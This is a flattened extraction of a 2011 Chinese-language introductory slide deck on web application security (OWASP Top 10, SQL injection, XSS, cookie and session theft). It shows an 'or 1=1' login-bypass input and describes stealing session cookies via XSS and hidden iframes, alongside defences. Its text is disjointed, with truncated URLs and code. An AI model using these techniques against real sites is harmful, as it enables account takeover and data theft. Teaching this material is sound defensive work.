资源描述
中央大學電子計算機中心多媒體與網路應用資訊推廣課程網頁應用程式的安全入門日期:2011/03/27講師:資工三 張竟 cwebb dot tw at gmail dot comAgenda嘴砲OWSAP Top 10SQL injectionXSScookie&session2Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session3不要做不要做壞事!壞事!4不要被不要被抓到!抓到!5不要被不要被抓到!抓到!6不要說我教的不要說我教的7Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session8網頁安全?早年 vs 現代靜態 vs 動態有程式 就有漏洞!9ways to attackOSweb serverweb application10attack scenariosattack web server gain privilege steal informations to attack usersattack other user steal informations execute other attacksmay be composite11Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session1213OWASP Top 10-2010A1:InjectionA2:Cross-Site Scripting(XSS)A3:Broken Authentication and Session ManagementA4:Insecure Direct Object ReferencesA5:Cross-Site Request Forgery(CSRF)14OWASP Top 10-2010A6:Security MisconfigurationA7:Insecure Cryptographic StorageA8:Failure to Restrict URL AccessA9:Insufficient Transport Layer ProtectionA10:Unvalidated Redirects and Forwards15OWASP Top 10-2010A1:InjectionA2:Cross-Site Scripting(XSS)A3:Broken Authentication and Session ManagementA4:Insecure Direct Object ReferencesA5:Cross-Site Request Forgery(CSRF)16OWASP Top 10-2010A6:Security MisconfigurationA7:Insecure Cryptographic StorageA8:Failure to Restrict URL AccessA9:Insufficient Transport Layer ProtectionA10:Unvalidated Redirects and Forwards17Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session18Injections駭客的填空遊戲where can attacker inject?database(MySQL,MS SQL,PostgreSQL.)no-sql Directory Service(LDAP)system command!19how SQL works in weblogin page for exampleclientweb serversql serverrequest whitid and pwdselect from account where id=id and pwd=pwdreturn result return login success/failed20Why SQL?廣大使用儲存大量的網站資料injection friendly21how injections work?以MySQL為例子$query=“select from account where id=$id and pwd=$pwd$id=or 1=1-select from account where id=-.22attack skillsunionblind attack23影響資料被偷/被改獲得網站權限整個網站被拿下#24how to defensesafe API過濾逃脫字元 不要直接把使用者輸入加入query找程式掃描弱點25Practice26Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session27XSSCross Site Scripting在別人的網站上寫程式!28background knowledgeHTTP GETHTTP POST29how to attackattack using POST/GETthe“scripting”in the serverstrange url30how to attackjavascript/31example http:/ Orange”)32what may happened?take you to bad sitesend your information to attackerJust For Fun!33Just For Fun SamyMySpace XSS attackSamy is my hero!Infection34Big Site also XSSableMySpaceFacebooktwitterPlurk.35how to defensefor server該逃的還是要逃找程式掃描弱點for user看到奇怪連結要警覺瀏覽器/防毒軟體36practice37Agenda嘴砲OWSAP Top 10SQL injectionXSScookie&session38background knowledgecookiesessionA cookie is a piece of text stored by a users web browser.A cookie can be used for authentication,storing site preferences,shopping cart contents,the identifier for a server-based session,or anything else that can be accomplished through storing text data.The session information is stored on the web server using the session identifier(session ID)generated as a result of the first(sometimes the first authenticated)request from the end user running a web browser.The storage of session IDs and the associated session data(user name,account number,etc.)on the web server is accomplished using a variety of techniques including,but not limited to:local memory,flat files,and databases.394041如果偷到了cookie可以.42how to steal it?4344把cookie送到雲端!用GET/POST方式讓網頁把cookie送走/ex:.join(sever side is simplejust keep the cookie45哪個白痴會點這鬼連結http:/ ( (ex:iframe長寬設0或1)ugly url EVERY WHEREhttps:/ agent/header綁IP*不要被攻擊成功*48鎖定user agent/header if(isset($_SESSIONHTTP_USER_AGENT)if($_SESSIONHTTP_USER_AGENT!=md5($_SERVERHTTP_USER_AGENT)exit();else$_SESSIONHTTP_USER_AGENT=md5($_SERVERHTTP_USER_AGENT);但是.當你偷的到cookie 會拿不到header嗎?49Practice50Q&A?51end52Reference53http:/www.owasp.org/http:/en.wikipedia.org/http:/goo.gl/cA3ahttp:/goo.gl/IwGbXhttp:/goo.gl/uQ4I1
展开阅读全文